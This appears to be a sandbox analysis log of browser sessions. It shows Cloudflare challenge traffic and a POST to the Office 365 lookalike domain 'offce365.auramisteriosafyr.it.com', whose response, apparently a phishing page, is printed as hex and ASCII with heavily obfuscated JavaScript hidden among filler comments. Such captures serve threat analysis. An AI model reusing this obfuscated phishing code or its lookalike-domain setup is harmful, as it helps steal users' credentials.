                                                                                        2025-03-24 04:00:21 UTC1369INData Raw: 76 30 4c 37 50 44 36 46 79 67 64 2f 66 7a 33 37 41 34 69 45 43 59 46 4a 76 4d 6c 46 44 67 5a 44 78 59 75 46 53 30 54 45 41 41 5a 48 53 4d 36 39 6a 59 37 4d 44 59 6c 46 7a 35 49 4a 68 77 64 4a 79 52 45 45 45 6b 76 54 68 4d 4c 4c 6b 74 48 4c 55 35 57 45 6b 30 36 56 30 45 77 50 55 4d 31 4f 6a 38 33 4c 45 68 48 4f 32 64 50 52 7a 39 4b 59 56 4e 76 51 6d 31 56 66 46 31 78 58 6e 4a 5a 62 46 31 67 54 55 39 5a 56 46 56 32 61 6d 5a 56 66 32 35 70 53 34 74 6c 62 59 53 44 62 55 35 67 6b 48 53 4d 57 48 64 36 6b 47 31 30 63 31 70 39 66 34 42 30 5a 36 53 4b 65 47 4f 72 67 59 6d 76 6f 49 36 62 6b 71 43 56 6c 59 69 34 6c 6f 32 4b 73 4c 53 5a 66 33 69 62 6e 72 4f 79 6e 70 4f 33 74 5a 2f 43 66 72 36 67 7a 37 7a 44 71 59 71 6c 72 36 79 6b 6b 39 4c 50 7a 36 6d 73 30 39 4c 42
                                                                                        Data Ascii: v0L7PD6Fygd/fz37A4iECYFJvMlFDgZDxYuFS0TEAAZHSM69jY7MDYlFz5IJhwdJyREEEkvThMLLktHLU5WEk06V0EwPUM1Oj83LEhHO2dPRz9KYVNvQm1VfF1xXnJZbF1gTU9ZVFV2amZVf25pS4tlbYSDbU5gkHSMWHd6kG10c1p9f4B0Z6SKeGOrgYmvoI6bkqCVlYi4lo2KsLSZf3ibnrOynpO3tZ/Cfr6gz7zDqYqlr6ykk9LPz6ms09LB
                                                                                        2025-03-24 04:00:21 UTC1369INData Raw: 49 45 39 65 48 38 47 41 38 66 4d 53 77 43 2f 42 54 76 2f 54 67 56 38 79 58 30 42 68 49 72 48 42 55 31 4c 55 42 44 47 77 34 35 4a 52 77 44 53 44 6f 4a 4b 78 77 6a 4a 55 4d 46 49 78 49 6a 49 41 34 53 47 6c 55 75 58 53 5a 54 55 55 6b 61 57 6a 45 66 4a 47 45 2b 4e 6c 6f 39 5a 47 4e 57 4c 45 35 68 55 54 77 30 54 57 4e 49 56 54 5a 73 66 46 46 75 61 45 70 66 63 54 6f 39 67 6b 46 47 68 6d 68 41 67 49 64 71 68 6f 5a 64 59 48 78 74 69 57 5a 65 6a 57 6c 34 6c 48 68 33 62 6d 68 71 5a 35 4b 64 61 32 2b 42 64 57 4f 6a 6b 71 4f 4b 66 36 32 45 69 4b 46 38 70 49 61 7a 62 61 46 32 70 61 47 4e 71 35 75 48 72 62 75 65 6d 71 47 39 76 62 43 6a 67 73 69 66 79 6f 4b 66 77 5a 32 4a 79 70 2b 6f 30 72 36 39 78 6f 33 46 30 62 58 62 78 73 57 75 33 73 71 7a 73 4a 6d 34 74 39 48 67 78
                                                                                        Data Ascii: IE9eH8GA8fMSwC/BTv/TgV8yX0BhIrHBU1LUBDGw45JRwDSDoJKxwjJUMFIxIjIA4SGlUuXSZTUUkaWjEfJGE+Nlo9ZGNWLE5hUTw0TWNIVTZsfFFuaEpfcTo9gkFGhmhAgIdqhoZdYHxtiWZejWl4lHh3bmhqZ5Kda2+BdWOjkqOKf62EiKF8pIazbaF2paGNq5uHrbuemqG9vbCjgsifyoKfwZ2Jyp+o0r69xo3F0bXbxsWu3sqzsJm4t9Hgx
                                                                                        2025-03-24 04:00:21 UTC969INData Raw: 6f 2f 53 7a 70 42 76 45 69 38 51 6f 54 39 7a 63 4e 4b 44 50 30 50 45 45 66 50 6a 78 41 41 45 4d 61 45 76 6f 43 4d 30 68 47 53 79 46 42 43 67 77 6f 4a 7a 5a 50 4b 6b 78 54 57 6a 45 32 47 56 68 63 57 55 70 68 49 57 45 67 5a 32 49 61 5a 32 5a 42 4f 69 59 6f 58 54 34 6f 4b 6d 74 77 4e 48 4e 7a 53 45 4a 79 65 48 55 76 4e 32 68 32 53 7a 52 57 64 6b 38 38 67 59 56 6a 67 30 6c 57 52 59 56 4f 66 59 47 4b 6a 32 64 55 6a 32 74 72 65 56 4b 54 69 56 69 62 63 70 42 62 58 5a 35 64 56 32 36 50 6f 5a 75 6e 70 4a 78 6a 71 47 35 74 73 57 32 68 68 6d 74 32 64 36 32 53 62 48 47 6c 65 33 57 54 66 62 79 2b 75 34 4b 58 77 49 61 46 77 34 50 48 70 6f 71 4b 70 49 32 4d 6a 63 36 7a 6a 38 32 56 70 38 76 56 31 36 75 74 32 4a 7a 52 76 5a 54 4d 73 37 69 6d 70 39 32 37 34 36 69 6c 71 75
                                                                                        Data Ascii: o/SzpBvEi8QoT9zcNKDP0PEEfPjxAAEMaEvoCM0hGSyFBCgwoJzZPKkxTWjE2GVhcWUphIWEgZ2IaZ2ZBOiYoXT4oKmtwNHNzSEJyeHUvN2h2SzRWdk88gYVjg0lWRYVOfYGKj2dUj2treVKTiVibcpBbXZ5dV26PoZunpJxjqG5tsW2hhmt2d62SbHGle3WTfby+u4KXwIaFw4PHpoqKpI2Mjc6zj82Vp8vV16ut2JzRvZTMs7imp92746ilqu


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.1649737104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:21 UTC638OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:21 UTC442INHTTP/1.1 400 Bad Request
                                                                                        Date: Mon, 24 Mar 2025 04:00:21 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 14
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: VFYnMzIo+eRsd/XMSvbTRzSb0psjTAkiIVRxkSXR+HyVwJBydkJ9zR/q8kRmBbMF40gyiqhX2EWb7Fs8n1hezA==$UiCMORnLQpopYYZiGChisA==
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925342d89dd542fe-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:21 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                                                        Data Ascii: {"err":100280}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.1649738172.67.210.1684436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:21 UTC949OUTPOST /CM4kN/ HTTP/1.1
                                                                                        Host: offce365.auramisteriosafyr.it.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 987
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/CM4kN/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: PHPSESSID=dv6sf7uhb6cju4btkvukae9i2f
                                                                                        2025-03-24 04:00:21 UTC987OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 6e 5a 55 71 72 4e 5a 61 31 79 61 43 74 77 52 55 32 43 71 50 4b 50 79 54 77 53 70 75 30 7a 66 37 76 34 76 50 65 42 6b 39 65 39 51 79 72 74 6a 6f 65 39 71 63 68 58 45 32 68 78 70 7a 52 32 6b 49 65 36 65 50 72 62 6f 6e 42 68 53 4f 4e 5f 69 6e 4c 45 49 44 76 6f 45 35 37 76 68 49 37 67 45 62 4c 4e 57 51 79 62 78 56 4f 4f 7a 52 76 54 52 6a 67 78 30 6d 74 6e 68 30 49 41 35 63 31 6d 58 63 62 38 42 51 59 38 2d 55 4f 4d 67 66 49 37 4e 76 45 68 30 72 79 79 5f 55 43 72 6e 30 31 62 6a 37 33 55 4e 54 6b 38 31 77 64 79 6c 53 74 4b 42 46 50 52 71 39 5a 64 6e 77 63 44 54 5f 48 4b 45 41 57 79 2d 32 6f 4a 6c 73 44 6c 44 47 6e 78 47 44 4f 70 6f 34 39 57 32 47 54 43 34 49 49 7a 6e 58 73 34 47 7a 58 6d 68
                                                                                        Data Ascii: cf-turnstile-response=0.nZUqrNZa1yaCtwRU2CqPKPyTwSpu0zf7v4vPeBk9e9Qyrtjoe9qchXE2hxpzR2kIe6ePrbonBhSON_inLEIDvoE57vhI7gEbLNWQybxVOOzRvTRjgx0mtnh0IA5c1mXcb8BQY8-UOMgfI7NvEh0ryy_UCrn01bj73UNTk81wdylStKBFPRq9ZdnwcDT_HKEAWy-2oJlsDlDGnxGDOpo49W2GTC4IIznXs4GzXmh
                                                                                        2025-03-24 04:00:22 UTC958INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4zlsovJ%2B%2BQzbAQrxwx%2FMwWUe7%2BWm9gIWCge6phfk0B9GwsoWVNlmRIz6aWA5eP5nDd2T8%2FQSOekYyQSxEvCaNjotP1GnBvWFjkuov9Yts%2FqwTBmSVUsO3hEDlqvGEG83kXf08YX67AbIs%2FLNKpWwUlsfaZs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925342d7ca5b52c6-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=97597&min_rtt=96258&rtt_var=21684&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2864&recv_bytes=2530&delivery_rate=38680&cwnd=241&unsent_bytes=0&cid=67996ec12b496fee&ts=510&x=0"
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 33 35 62 62 0d 0a 3c 21 2d 2d 20 3c 73 70 61 6e 3e 50 6f 72 6b 20 63 68 6f 70 20 73 68 6f 72 74 20 72 69 62 73 20 65 69 75 73 6d 6f 64 2c 20 69 70 73 75 6d 20 67 72 6f 75 6e 64 20 72 6f 75 6e 64 20 65 73 74 20 6b 69 65 6c 62 61 73 61 20 63 68 69 73 6c 69 63 20 63 6f 6d 6d 6f 64 6f 20 62 72 65 73 61 6f 6c 61 20 73 70 61 72 65 20 72 69 62 73 20 73 69 72 6c 6f 69 6e 20 63 69 6c 6c 75 6d 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 72 68 31 33 7a 38 6a 65 6d 74 20 3d 20 27 27 3b 2f 2f 20 4c 65 62 65 72 6b 61 73 20 61 6e 64 6f 75 69 6c 6c 65 20 65 78 20 64 6f 20 76 65 6c 69 74 20 6c 61 6e 64 6a 61 65 67 65 72 20 65 6c 69 74 20 6c 61 62 6f 72 65 2c 20 66 75 67 69 61 74 20 6c 61 62 6f 72 69 73 20 61 64 69 70 69 73 69 63 69 6e 67
                                                                                        Data Ascii: 35bb... <span>Pork chop short ribs eiusmod, ipsum ground round est kielbasa chislic commodo bresaola spare ribs sirloin cillum.</span> --><script>let rh13z8jemt = '';// Leberkas andouille ex do velit landjaeger elit labore, fugiat laboris adipisicing
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 55 27 2c 27 21 63 5a 64 44 72 40 55 27 2c 27 30 77 77 30 6f 45 75 27 2c 27 7c 77 6d 73 6b 45 75 27 2c 27 48 77 66 60 2e 2c 75 27 2c 27 2a 38 3e 30 22 4b 5f 55 27 2c 27 2f 3e 2c 5d 27 2c 27 52 2e 29 4a 2f 3c 41 3c 76 53 25 6c 7d 7e 23 50 46 60 27 2c 27 37 36 4b 42 22 33 4f 75 75 37 55 4f 60 27 2c 27 32 2b 77 56 25 4b 5f 55 27 2c 27 29 3d 65 6a 59 49 48 55 27 2c 27 46 2e 7a 6a 7a 27 2c 27 68 48 7c 5d 6c 62 7d 68 5e 5f 33 59 60 27 2c 27 60 34 74 64 5d 2c 36 66 39 68 7e 3a 3d 40 52 27 2c 27 29 3d 69 30 77 60 2b 29 6a 24 63 7c 72 62 27 2c 27 68 48 35 70 7b 42 38 69 27 2c 27 7a 7b 6f 70 4b 43 44 27 2c 27 60 34 74 64 5d 2c 34 2c 2e 47 2c 78 67 23 6a 74 27 2c 27 42 5a 51 4a 39 3c 32 60 27 2c 27 3e 34 6b 25 7e 6f 75 69 27 2c 27 29 3d 69 30 5a 7d 4b 29 7e 2b 3b 5f
                                                                                        Data Ascii: U','!cZdDr@U','0ww0oEu','|wmskEu','Hwf`.,u','*8>0"K_U','/>,]','R.)J/<A<vS%l}~#PF`','76KB"3Ouu7UO`','2+wV%K_U',')=ejYIHU','F.zjz','hH|]lb}h^_3Y`','`4td],6f9h~:=@R',')=i0w`+)j$c|rb','hH5p{B8i','z{opKCD','`4td],4,.G,xg#jt','BZQJ9<2`','>4k%~oui',')=i0Z}K)~+;_
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 52 42 37 57 6b 25 45 63 27 2c 27 73 61 38 61 39 45 29 71 4d 4f 27 2c 27 60 77 5d 37 7d 40 5d 5d 7b 70 76 4e 41 27 2c 27 68 6c 64 73 5d 44 21 4f 41 70 7b 76 23 32 3c 51 5b 32 6d 57 2c 66 52 68 70 57 33 72 6c 62 25 33 7d 75 27 2c 27 5a 28 53 40 63 34 42 33 5a 32 4a 7d 77 37 49 64 6e 2a 29 64 2b 7e 4b 55 57 4f 7c 52 4c 6d 63 70 7c 38 4c 62 39 27 2c 27 5d 58 5f 59 34 6c 76 35 26 50 6a 4f 5a 61 33 7a 77 57 74 64 49 72 77 41 5d 42 48 27 2c 27 7e 2a 5f 4a 4d 5a 62 70 58 68 77 64 3e 40 2a 34 57 50 5a 7d 5b 2b 6e 48 3e 7e 76 34 28 58 4a 5d 6e 77 74 66 79 2b 7b 43 5f 56 27 2c 27 42 38 38 63 2f 74 55 48 36 42 46 37 52 53 59 70 37 5f 58 27 2c 27 2c 5e 21 6a 68 31 32 7a 2e 28 42 7b 50 37 58 42 4f 43 2f 57 67 4e 46 68 4a 4f 44 7e 28 58 4e 3c 7d 5e 38 7d 5e 7c 7b 26 77
                                                                                        Data Ascii: RB7Wk%Ec','sa8a9E)qMO','`w]7}@]]{pvNA','hlds]D!OAp{v#2<Q[2mW,fRhpW3rlb%3}u','Z(S@c4B3Z2J}w7Idn*)d+~KUWO|RLmcp|8Lb9',']X_Y4lv5&PjOZa3zwWtdIrwA]BH','~*_JMZbpXhwd>@*4WPZ}[+nH>~v4(XJ]nwtfy+{C_V','B88c/tUH6BF7RSYp7_X',',^!jh12z.(B{P7XBOC/WgNFhJOD~(XN<}^8}^|{&w
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 21 35 27 2c 27 63 70 34 6d 2e 57 40 55 27 2c 27 75 57 39 4a 7a 2c 49 63 21 76 46 27 2c 27 63 6c 51 25 6a 40 74 50 36 56 6b 46 39 79 58 5e 3a 21 7e 6a 62 5f 75 27 2c 27 36 6c 3e 6a 32 77 7b 7b 55 7e 4b 27 2c 27 7e 64 2a 73 60 4a 6c 29 2f 52 4c 62 36 5b 7a 7a 4d 32 5a 62 51 5d 3b 34 63 27 2c 27 38 2b 4d 46 2b 4c 33 25 2e 76 65 4a 5a 33 6a 64 2b 57 59 73 39 27 2c 27 72 73 4a 61 61 61 22 25 37 47 50 5e 43 7e 52 27 2c 27 6c 6f 72 7a 2e 2b 51 68 27 2c 27 5e 47 7d 63 5b 33 3b 68 27 2c 27 52 55 6e 73 55 39 2f 39 47 27 2c 27 61 4d 2e 58 21 75 4c 7d 27 2c 27 3e 3e 36 59 4d 4f 4a 27 2c 27 4c 57 78 6e 28 27 2c 27 5e 2b 33 44 55 24 40 40 35 4e 6b 27 2c 27 28 41 53 30 37 37 6a 5b 34 6c 60 79 2f 7b 27 2c 27 2f 64 4b 32 25 27 2c 27 64 70 72 3b 24 7b 48 52 27 2c 27 37 64
                                                                                        Data Ascii: !5','cp4m.W@U','uW9Jz,Ic!vF','clQ%j@tP6VkF9yX^:!~jb_u','6l>j2w{{U~K','~d*s`Jl)/RLb6[zzM2ZbQ];4c','8+MF+L3%.veJZ3jd+WYs9','rsJaaa"%7GP^C~R','lorz.+Qh','^G}c[3;h','RUnsU9/9G','aM.X!uL}','>>6YMOJ','LWxn(','^+3DU$@@5Nk','(AS077j[4l`y/{','/dK2%','dpr;${HR','7d
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 50 65 35 69 22 3b 79 63 74 6c 73 4b 61 49 79 3b 5d 63 54 21 61 49 61 72 5e 47 77 49 4c 57 26 74 6e 4f 70 2a 34 71 33 49 64 23 43 6a 7a 7a 7c 49 5d 5b 43 78 41 6d 3d 7e 2a 5e 24 3f 22 79 21 4f 35 65 35 3b 69 48 62 4f 51 4a 51 33 77 63 79 67 4f 30 43 7c 61 4c 23 28 23 21 24 26 22 54 78 5a 34 34 57 3c 72 46 23 6a 64 3a 58 33 37 50 40 6d 63 33 2b 6c 60 42 48 41 5e 5e 24 3f 22 79 21 44 66 7d 28 35 4a 2a 74 22 35 28 51 57 46 4a 34 61 67 4f 65 65 4f 2b 33 73 74 78 24 7c 73 2e 77 7d 50 22 47 7d 26 7d 5b 6b 64 53 2a 31 60 3e 7c 56 66 3a 7e 3d 24 68 37 53 5e 7b 22 7d 4c 56 7d 7d 54 32 52 73 6d 26 44 6c 70 3b 58 43 57 4f 7d 65 4f 3d 7e 7a 4f 54 33 4a 67 78 24 61 37 43 26 59 4f 69 35 35 54 53 48 7e 2a 3f 58 4c 64 7a 7c 49 5d 5b 43 78 41 37 74 3c 74 32 6c 7a 49 70 5a
                                                                                        Data Ascii: Pe5i";yctlsKaIy;]cT!aIar^GwILW&tnOp*4q3Id#Cjzz|I][CxAm=~*^$?"y!O5e5;iHbOQJQ3wcygO0C|aL#(#!$&"TxZ44W<rF#jd:X37P@mc3+l`BHA^^$?"y!Df}(5J*t"5(QWFJ4agOeeO+3stx$|s.w}P"G}&}[kdS*1`>|Vf:~=$h7S^{"}LV}}T2Rsm&Dlp;XCWO}eO=~zOT3Jgx$a7C&YOi55TSH~*?XLdz|I][CxA7t<t2lzIpZ
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 2c 7c 2c 51 42 43 76 49 2a 32 44 54 69 7e 64 52 26 74 67 33 4c 24 2a 7d 23 66 29 55 32 52 7c 3a 5e 62 45 46 6c 73 33 5a 51 5b 31 50 32 56 28 66 32 78 3a 5e 48 51 70 37 35 72 69 77 36 4c 33 6d 5a 52 3c 64 57 63 30 57 23 40 33 7a 3a 3d 67 2c 6a 40 2b 42 68 2b 3d 7d 22 43 42 33 3a 50 4e 28 76 74 38 35 51 34 60 64 3c 44 66 70 59 4a 60 61 4c 23 75 5e 47 77 55 53 72 72 34 50 64 3a 39 34 50 32 28 34 47 34 7a 6a 7b 7d 3a 54 31 43 3e 58 5d 37 49 74 7e 34 3c 25 23 66 3f 6e 69 43 72 2c 3a 78 66 37 40 38 5b 7a 38 48 57 70 4e 4c 72 30 41 23 2b 42 3e 57 49 53 7c 6c 38 67 5f 56 4a 46 76 52 49 64 2a 2a 3f 73 73 48 58 4f 43 2b 30 7b 60 48 59 33 6c 34 47 63 44 5a 53 4f 60 56 7a 37 72 4b 66 37 2f 32 72 59 6f 32 7b 26 79 3d 47 61 79 48 64 3c 5d 6c 2b 46 28 7e 32 4f 4e 28 44
                                                                                        Data Ascii: ,|,QBCvI*2DTi~dR&tg3L$*}#f)U2R|:^bEFls3ZQ[1P2V(f2x:^HQp75riw6L3mZR<dWc0W#@3z:=g,j@+Bh+=}"CB3:PN(vt85Q4`d<DfpYJ`aL#u^GwUSrr4Pd:94P2(4G4zj{}:T1C>X]7It~4<%#f?niCr,:xf7@8[z8HWpNLr0A#+B>WIS|l8g_VJFvRId**?ssHXOC+0{`HY3l4GcDZSO`Vz7rKf7/2rYo2{&y=GayHd<]l+F(~2ON(D
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 57 2a 66 4c 6b 7c 5d 55 27 2c 27 3d 3d 6c 53 7a 27 2c 27 25 34 31 4c 79 79 75 27 2c 27 51 2e 47 57 76 49 32 25 63 27 2c 27 3e 2e 39 64 60 79 46 55 27 2c 27 4a 34 7e 70 3d 27 2c 27 4e 5d 6b 7d 45 72 50 55 7d 42 27 2c 27 21 5d 2a 7d 43 78 30 29 36 32 28 62 52 4e 4b 6b 4a 5d 31 4c 2c 79 75 27 2c 27 79 34 22 57 36 6c 2c 6e 30 26 46 6d 41 27 2c 27 72 5a 59 5e 76 7a 5a 69 27 2c 27 6b 2a 38 7d 46 27 2c 27 4c 3e 4b 42 5a 66 29 68 3b 27 2c 27 21 21 58 42 4a 33 32 60 27 5d 29 3b 43 44 5a 50 79 37 3d 28 7a 4a 79 68 70 5a 2c 49 67 66 51 62 66 2c 55 41 47 52 6e 41 2c 55 66 72 37 6b 65 2c 54 6e 65 74 49 4e 29 3d 3e 7b 69 66 28 74 79 70 65 6f 66 20 55 66 72 37 6b 65 3d 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 7b 55 66 72 37 6b 65 3d 4a 54 73 39 31 74 7d 69 66 28 74 79
                                                                                        Data Ascii: W*fLk|]U','==lSz','%41Lyyu','Q.GWvI2%c','>.9d`yFU','J4~p=','N]k}ErPU}B','!]*}Cx0)62(bRNKkJ]1L,yu','y4"W6l,n0&FmA','rZY^vzZi','k*8}F','L>KBZf)h;','!!XBJ32`']);CDZPy7=(zJyhpZ,IgfQbf,UAGRnA,Ufr7ke,TnetIN)=>{if(typeof Ufr7ke==='undefined'){Ufr7ke=JTs91t}if(ty
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 6d 43 68 72 76 3d 4d 6e 49 4d 46 4a 28 2d 30 78 32 32 29 3b 73 69 6d 43 68 72 76 3c 43 44 5a 50 79 37 2e 6c 65 6e 67 74 68 3b 73 69 6d 43 68 72 76 2b 2b 29 69 66 28 74 79 70 65 6f 66 20 55 66 72 37 6b 65 5b 43 44 5a 50 79 37 5b 73 69 6d 43 68 72 76 5d 5d 3d 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 7b 63 6f 6e 74 69 6e 75 65 20 6c 48 39 56 5a 37 7d 72 65 74 75 72 6e 20 55 66 72 37 6b 65 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 55 66 72 37 6b 65 7c 7c 74 68 69 73 7d 7a 4a 79 68 70 5a 28 54 6e 65 74 49 4e 3d 74 57 42 75 72 51 30 28 29 7c 7c 7b 7d 2c 73 69 6d 43 68 72 76 3d 54 6e 65 74 49 4e 2e 54 65 78 74 44 65 63 6f 64 65 72 2c 4d 6e 49 4d 46 4a 3d 54 6e 65 74 49 4e 2e 55 69 6e 74 38 41 72 72 61 79 2c 57 48 32 57 59 64 42 3d 54 6e 65 74 49 4e
                                                                                        Data Ascii: mChrv=MnIMFJ(-0x22);simChrv<CDZPy7.length;simChrv++)if(typeof Ufr7ke[CDZPy7[simChrv]]==='undefined'){continue lH9VZ7}return Ufr7ke}catch(e){}return Ufr7ke||this}zJyhpZ(TnetIN=tWBurQ0()||{},simChrv=TnetIN.TextDecoder,MnIMFJ=TnetIN.Uint8Array,WH2WYdB=TnetIN
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 43 44 5a 50 79 37 2e 70 75 73 68 28 49 67 66 51 62 66 5b 73 69 6d 43 68 72 76 5d 7c 7c 28 49 67 66 51 62 66 5b 73 69 6d 43 68 72 76 5d 3d 55 66 72 37 6b 65 28 73 69 6d 43 68 72 76 29 29 29 7d 72 65 74 75 72 6e 20 43 44 5a 50 79 37 2e 6a 6f 69 6e 28 27 27 29 7d 2c 30 78 31 29 7d 29 28 29 2c 68 6c 78 54 72 55 63 28 6c 54 34 64 44 4c 4b 2c 30 78 31 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 54 34 64 44 4c 4b 28 2e 2e 2e 49 67 66 51 62 66 29 7b 7a 4a 79 68 70 5a 28 49 67 66 51 62 66 2e 6c 65 6e 67 74 68 3d 75 64 4b 62 76 63 59 28 30 78 33 39 29 2c 49 67 66 51 62 66 5b 75 64 4b 62 76 63 59 28 30 78 37 64 29 5d 3d 2d 30 78 37 66 29 3b 69 66 28 74 79 70 65 6f 66 20 73 69 6d 43 68 72 76 21 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 26 26 73 69 6d 43 68 72 76 29 7b 72 65
                                                                                        Data Ascii: CDZPy7.push(IgfQbf[simChrv]||(IgfQbf[simChrv]=Ufr7ke(simChrv)))}return CDZPy7.join('')},0x1)})(),hlxTrUc(lT4dDLK,0x1));function lT4dDLK(...IgfQbf){zJyhpZ(IgfQbf.length=udKbvcY(0x39),IgfQbf[udKbvcY(0x7d)]=-0x7f);if(typeof simChrv!=='undefined'&&simChrv){re


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.1649740151.101.66.1374436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:22 UTC699OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                        Host: code.jquery.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:22 UTC562INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 69597
                                                                                        Server: nginx
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                        ETag: "28feccc0-10fdd"
                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 1111148
                                                                                        Date: Mon, 24 Mar 2025 04:00:22 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-lga21953-LGA
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1742788823.686588,VS0,VE1
                                                                                        Vary: Accept-Encoding
